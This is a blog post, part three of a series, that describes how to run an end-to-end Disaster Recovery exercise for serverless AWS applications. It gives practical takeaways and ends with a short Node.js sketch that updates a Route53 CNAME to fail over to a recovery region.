This is part three of a multi-part blog series. In the first post we covered Disaster Recovery planning when building serverless applications and in the second post we covered the systems engineering needed for an automated solution in the AWS cloud. In this post, we’ll discuss the end-to-end Disaster Recovery exercise we performed to validate the plan.

The time has come to exercise the Disaster Recovery plan. The objective of this phase is to see how closely the plan correlates to the current reality of your systems and to identify areas for improvement. In practice, this means assembling a team to conduct the exercise and documenting the process within the communication channel you outlined in the plan.

Background

In the first post you’ll find an outline of the plan that we’ll be referencing in this exercise. Section 2 describes the process of initiating the plan and assigning roles and Section 3 describes the communication channels used to keep stakeholders in sync.

Set the Stage

Decide who will be involved in the exercise, block out a chunk of time equivalent to the Recovery Time Objective, and create the communication channel in Slack (or whatever communication tool your organization uses; e.g., Google Hangouts, Skype, etc.).

Create a document to capture key information relevant to the Disaster Recovery exercise, such as who is assigned which roles, the AWS regions in play, and, most importantly, a timeline pertaining to the initiation and completion of each recovery step. Whereas the Disaster Recovery plan is a living document to be updated over time, the Disaster Recovery exercise document mentioned here is specific to the date of the exercise; e.g., Disaster Recovery Exercise 20180706.

Conduct the Exercise

Enter the communication channel and post a message that signals the start of the exercise immediately followed by a message to the executive team to get their approval to initiate the Disaster Recovery plan.

Upon completion of the exercise, post a message that signals the end of the exercise.

Key Takeaways

  1. Disaster Recovery exercises can be stressful. Be courteous and supportive to one another.
  2. High-performance teams develop trust by practicing effective communication. Lean towards communication that is both precise and unambiguous. This is easier said than done, but it gets easier with experience. Over time, the Disaster Recovery plan and exercise will become self-reinforcing.
  3. Don’t forget to involve a representative of the executive team. This is to ensure that the operational status is being communicated across all levels.
  4. Be clear on which AWS region represents the source and which AWS region represents the DR target.
  5. Research and experiment with the options you have available to automate DNS changes (see the sketch after this list). Again, the key here is gaining the skills and confidence through testing and optimizing for fast recovery. Know your record types (A and CNAME) and the importance of TTL.
  6. Verify completion of recovery from the perspective of a customer.
  7. Conduct a retrospective to illuminate areas for improvement or research. Ask questions that encourage participants to openly discuss both the technical and psychological aspects of the exercise.
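
As a starting point for the DNS automation mentioned in item 5, here's a minimal sketch using the AWS SDK for JavaScript to repoint a CNAME at the recovery region's endpoint. The hosted zone ID, record name, TTL, and failover target are placeholders for your own values:

'use strict'

// Minimal sketch: repoint a CNAME at the DR region's endpoint during failover.
// The hosted zone ID, record name, target, and TTL below are placeholders.
const AWS = require('aws-sdk')
const route53 = new AWS.Route53()

async function failoverDns () {
  const params = {
    HostedZoneId: 'Z1EXAMPLE',
    ChangeBatch: {
      Comment: 'DR exercise: point app at the recovery region',
      Changes: [{
        Action: 'UPSERT',
        ResourceRecordSet: {
          Name: 'app.example.com',
          Type: 'CNAME',
          TTL: 60, // keep TTLs short so the cutover propagates quickly
          ResourceRecords: [{ Value: 'app-dr.us-west-2.example.com' }]
        }
      }]
    }
  }
  const result = await route53.changeResourceRecordSets(params).promise()
  console.log(`Change ${result.ChangeInfo.Id} is ${result.ChangeInfo.Status}`)
}

failoverDns().catch(console.error)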
